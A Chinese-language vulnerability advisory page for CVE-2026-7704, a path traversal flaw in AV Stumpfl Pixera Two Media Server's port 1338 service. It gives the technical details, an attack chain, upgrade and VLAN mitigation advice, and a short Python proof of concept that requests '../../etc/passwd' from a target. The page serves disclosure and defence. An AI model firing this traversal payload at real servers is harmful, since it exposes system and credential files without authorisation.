IPBUF安全漏洞报告
English
CVE-2026-7704 CVSS 4.3 中危

CVE-2026-7704 AV Stumpfl Pixera 路径遍历漏洞

披露日期: 2026-05-03
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7704
漏洞类型
路径遍历
CVSS评分
4.3 中危
攻击向量
邻接 (AV:A)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
AV Stumpfl Pixera Two Media Server

相关标签

路径遍历Path TraversalAV StumpflPixeraMedia ServerCWE-22

漏洞概述

AV Stumpfl Pixera Two Media Server 25.1 R2及之前版本被发现存在路径遍历漏洞。该漏洞影响Service Port 1338组件,由于未正确处理用户输入,未经身份验证的攻击者可利用此漏洞读取服务器上的敏感文件。厂商已发布25.2 R3版本修复此问题,建议用户尽快升级。

技术细节

该漏洞存在于AV Stumpfl Pixera Two Media Server的Service Port 1338组件中。由于该组件在处理特定HTTP请求时,未能对输入参数中的路径字符(如“../”)进行严格的校验和过滤,导致攻击者可以利用目录遍历序列访问服务器文件系统上的任意文件。根据CVSS向量(AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N),该漏洞属于邻接网络攻击,无需复杂配置,且不需要用户交互和身份认证即可被利用。攻击者只需与目标服务器处于同一网络段,即可发送特制的数据包读取敏感文件。虽然该漏洞仅影响机密性(C:L),未直接导致完整性或可用性受损,但泄露配置文件或用户凭证可能导致后续更严重的攻击。

攻击链分析

STEP 1
侦察
攻击者在同一网络段扫描目标主机,检测开放在1338端口的AV Stumpfl Pixera服务。
STEP 2
漏洞利用
攻击者向端口1338发送包含路径遍历字符(如../)的特制HTTP请求,试图访问系统敏感目录。
STEP 3
数据获取
服务器未能过滤恶意请求,返回目标文件(如/etc/passwd或配置文件)的内容,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: AV Stumpfl Pixera Two Media Server - Path Traversal (CVE-2026-7704) # Vulnerable Component: Service Port 1338 # Description: Unauthenticated path traversal allows reading arbitrary files. target_ip = "192.168.1.100" # Replace with the target IP address target_port = 1338 # Common payload to read Linux password file payload = "/../../../../../etc/passwd" url = f"http://{target_ip}:{target_port}{payload}" try: response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] Exploit successful! File content:\n{response.text}") else: print(f"[-] Exploit failed or file not found. Status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

AV Stumpfl Pixera Two Media Server <= 25.1 R2

防御指南

临时缓解措施
如果无法立即升级,建议将设备部署在隔离的VLAN中,并严格限制对1338端口的入站流量,仅允许必要的管理终端访问。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表